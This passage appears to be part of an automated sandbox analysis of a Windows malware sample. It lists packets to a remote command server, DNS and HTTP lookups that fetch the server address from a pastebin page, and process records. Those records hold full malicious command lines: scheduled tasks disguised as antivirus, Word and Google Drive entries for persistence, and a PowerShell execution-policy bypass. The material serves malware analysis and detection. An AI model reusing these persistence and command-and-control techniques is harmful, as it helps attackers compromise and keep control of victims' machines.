                            Jul 3, 2024 15:53:32.261266947 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:32.541838884 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:32.541992903 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:32.543174028 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:32.568717003 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:32.568871975 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:32.897023916 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:32.897166014 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:33.253446102 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:39.118863106 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:39.470993042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:39.471232891 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:39.829354048 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:42.868387938 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.218244076 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:43.218476057 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.526988029 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:43.571228981 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.796133041 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:43.796278000 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.796991110 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.805700064 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:43.879322052 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:43.879461050 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.153948069 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.154123068 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.168507099 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.168695927 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.476404905 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.508641005 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.524118900 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.787777901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.787906885 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.788827896 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:44.831624031 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:44.831861019 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:45.152350903 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:45.152559996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:45.513740063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:49.273293972 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:49.633593082 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:49.633819103 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:49.952148914 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:50.007370949 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:50.261513948 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:50.261733055 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:50.262510061 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:50.314629078 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:50.314838886 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:50.610791922 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:50.610912085 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:50.979046106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:56.599808931 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:56.962366104 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:56.962503910 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:57.271270037 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:57.318134069 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:57.540796995 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:57.540983915 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:57.541692019 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:57.626471996 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:57.626662016 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:57.902267933 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:57.902414083 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:58.266191006 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:01.505001068 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:01.865540981 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:01.865720034 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:02.173525095 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:02.223431110 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:02.488581896 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:02.488816023 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:02.489656925 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:02.530849934 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:02.531013966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:02.847150087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:02.847301006 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:03.205872059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.002069950 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.360063076 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.360260010 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.669423103 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.721489906 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.945609093 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.945755959 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.946640968 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.040462971 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:11.040616989 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.298635006 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:11.298856020 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.658773899 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:15.830276966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.191992998 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.192148924 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.508794069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.563960075 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.626571894 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.817370892 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.817523003 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.817816019 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.875910044 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.876013994 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.987875938 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.988061905 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.177196026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.177341938 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.297198057 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.345068932 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.531409025 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.563456059 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.563615084 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.563930035 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.653693914 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.653886080 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.921947956 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.922183037 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:18.279953957 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.077208996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:28.429394007 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.429585934 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:28.737472057 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.780122995 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.052655935 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.052851915 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.053105116 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.087910891 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.088134050 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.409079075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.409208059 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.767734051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:30.357996941 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:30.721955061 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:30.722201109 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.031090975 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.076391935 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.297688961 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.297904015 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.298178911 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.384624004 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.384836912 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.656196117 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.656387091 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:32.015408039 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.324542046 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:40.683259964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.683465958 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:40.991476059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.991935015 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:41.354409933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:41.354602098 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:41.702816963 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.089241028 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:44.446455002 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.446670055 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:44.755544901 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.756104946 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.019094944 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:45.019248962 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.108941078 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:45.109172106 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.464709044 CEST4499849743147.185.221.18192.168.11.20
                            Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                            Jul 3, 2024 15:50:09.548383951 CEST  49425        53         192.168.11.20  1.1.1.1
                            Jul 3, 2024 15:50:09.668570042 CEST  53           49425      1.1.1.1        192.168.11.20
                            Jul 3, 2024 15:50:10.230655909 CEST  62050        53         192.168.11.20  1.1.1.1
                            Jul 3, 2024 15:50:10.406136036 CEST  53           62050      1.1.1.1        192.168.11.20
                            Jul 3, 2024 15:50:15.912108898 CEST  58917        53         192.168.11.20  1.1.1.1
                            Jul 3, 2024 15:50:16.032835960 CEST  53           58917      1.1.1.1        192.168.11.20
                            Jul 3, 2024 15:50:34.232708931 CEST  52419        53         192.168.11.20  1.1.1.1
                            Jul 3, 2024 15:50:34.351747990 CEST  53           52419      1.1.1.1        192.168.11.20
                            Timestamp                            Source IP      Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
                            Jul 3, 2024 15:50:09.548383951 CEST  192.168.11.20  1.1.1.1  0xcda9    Standard query (0)  pastebin.com             A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:10.230655909 CEST  192.168.11.20  1.1.1.1  0x7651    Standard query (0)  q-policies.gl.at.ply.gg  A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:15.912108898 CEST  192.168.11.20  1.1.1.1  0xf09a    Standard query (0)  icanhazip.com            A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:34.232708931 CEST  192.168.11.20  1.1.1.1  0xc4f     Standard query (0)  pastebin.com             A (IP address)  IN (0x0001)  false
                            Timestamp                            Source IP  Dest IP        Trans ID  Reply Code    Name                     CName  Address         Type            Class        DNS over HTTPS
                            Jul 3, 2024 15:50:09.668570042 CEST  1.1.1.1    192.168.11.20  0xcda9    No error (0)  pastebin.com                    104.20.3.235    A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:09.668570042 CEST  1.1.1.1    192.168.11.20  0xcda9    No error (0)  pastebin.com                    172.67.19.24    A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:09.668570042 CEST  1.1.1.1    192.168.11.20  0xcda9    No error (0)  pastebin.com                    104.20.4.235    A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:10.406136036 CEST  1.1.1.1    192.168.11.20  0x7651    No error (0)  q-policies.gl.at.ply.gg         147.185.221.18  A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:16.032835960 CEST  1.1.1.1    192.168.11.20  0xf09a    No error (0)  icanhazip.com                   104.16.185.241  A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:16.032835960 CEST  1.1.1.1    192.168.11.20  0xf09a    No error (0)  icanhazip.com                   104.16.184.241  A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:34.351747990 CEST  1.1.1.1    192.168.11.20  0xc4f     No error (0)  pastebin.com                    104.20.3.235    A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:34.351747990 CEST  1.1.1.1    192.168.11.20  0xc4f     No error (0)  pastebin.com                    104.20.4.235    A (IP address)  IN (0x0001)  false
                            Jul 3, 2024 15:50:34.351747990 CEST  1.1.1.1    192.168.11.20  0xc4f     No error (0)  pastebin.com                    172.67.19.24    A (IP address)  IN (0x0001)  false
                            • pastebin.com
                            • icanhazip.com
                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                            0           192.168.11.20  49739        104.16.185.241  80                8868  C:\Users\user\Desktop\ptKNiAaGus.exe
                            Timestamp                            Bytes transferred  Direction  Data
                            Jul 3, 2024 15:50:16.154191017 CEST  63                 OUT        GET / HTTP/1.1
                            Host: icanhazip.com
                            Connection: Keep-Alive
                            Jul 3, 2024 15:50:16.288372040 CEST  535                IN         HTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:16 GMT
                            Content-Type: text/plain
                            Content-Length: 13
                            Connection: keep-alive
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET
                            Set-Cookie: __cf_bm=Nv2wOQQkFxllt.30NSNtKjyjCWnsqWSAo0wm45NMMRY-1720014616-1.0.1.1-Ch.Mxn9q0CDfbk0CVRoNHcd9vEiS.v7N5z8wwLH6XZNbXKXmixqfaaVl_8Mn1Gzu5kbucCdFc9dK8mtLd5mf.w; path=/; expires=Wed, 03-Jul-24 14:20:16 GMT; domain=.icanhazip.com; HttpOnly
                            Server: cloudflare
                            CF-RAY: 89d757f75cae122d-ORD
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39 0a
                            Data Ascii: 81.181.62.99


                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID    Process
                            1           192.168.11.20  49744        104.16.185.241  80                10036  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            Timestamp                            Bytes transferred  Direction  Data
                            Jul 3, 2024 15:50:35.752938032 CEST  63                 OUT        GET / HTTP/1.1
                            Host: icanhazip.com
                            Connection: Keep-Alive
                            Jul 3, 2024 15:50:35.878719091 CEST  535                IN         HTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:35 GMT
                            Content-Type: text/plain
                            Content-Length: 13
                            Connection: keep-alive
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET
                            Set-Cookie: __cf_bm=.YLP8f6.zktCvrVcOVtz8RhgWrDxRR38LHUQz7_l.9c-1720014635-1.0.1.1-TO0akXd7NjmJzTMC88iDH9.qcO.A1eNiGCSG7QBYSllMSfb9K7xzSD7hFkrulGsS8AcLQj6MAJUJb16eeRH7lA; path=/; expires=Wed, 03-Jul-24 14:20:35 GMT; domain=.icanhazip.com; HttpOnly
                            Server: cloudflare
                            CF-RAY: 89d75871db536216-ORD
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39 0a
                            Data Ascii: 81.181.62.99


                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                            0           192.168.11.20  49734        104.20.3.235    443               8868  C:\Users\user\Desktop\ptKNiAaGus.exe
                            Timestamp                Bytes transferred  Direction  Data
                            2024-07-03 13:50:09 UTC  74                 OUT        GET /raw/LmbvnzZM HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-07-03 13:50:10 UTC  397                IN         HTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:10 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: HIT
                            Age: 596
                            Last-Modified: Wed, 03 Jul 2024 13:40:14 GMT
                            Server: cloudflare
                            CF-RAY: 89d757d17d942aa2-ORD
                            2024-07-03 13:50:10 UTC  35                 IN         Data Raw: 31 64 0d 0a 71 2d 70 6f 6c 69 63 69 65 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 34 39 39 38 0d 0a
                            Data Ascii: 1dq-policies.gl.at.ply.gg:44998
                            2024-07-03 13:50:10 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID    Process
                            1           192.168.11.20  49742        104.20.3.235    443               10036  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            Timestamp                Bytes transferred  Direction  Data
                            2024-07-03 13:50:34 UTC  74                 OUT        GET /raw/LmbvnzZM HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-07-03 13:50:34 UTC  397                IN         HTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:34 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: HIT
                            Age: 620
                            Last-Modified: Wed, 03 Jul 2024 13:40:14 GMT
                            Server: cloudflare
                            CF-RAY: 89d7586bac5a2bd0-ORD
                            2024-07-03 13:50:34 UTC  35                 IN         Data Raw: 31 64 0d 0a 71 2d 70 6f 6c 69 63 69 65 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 34 39 39 38 0d 0a
                            Data Ascii: 1dq-policies.gl.at.ply.gg:44998
                            2024-07-03 13:50:34 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Target ID:0
                            Start time:09:50:05
                            Start date:03/07/2024
                            Path:C:\Users\user\Desktop\ptKNiAaGus.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\ptKNiAaGus.exe"
                            Imagebase:0x760000
                            File size:460'288 bytes
                            MD5 hash:4410AF8BEC1266D76029F9BB042C6A73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff737160000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:8
                            Start time:09:50:29
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:09:50:29
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
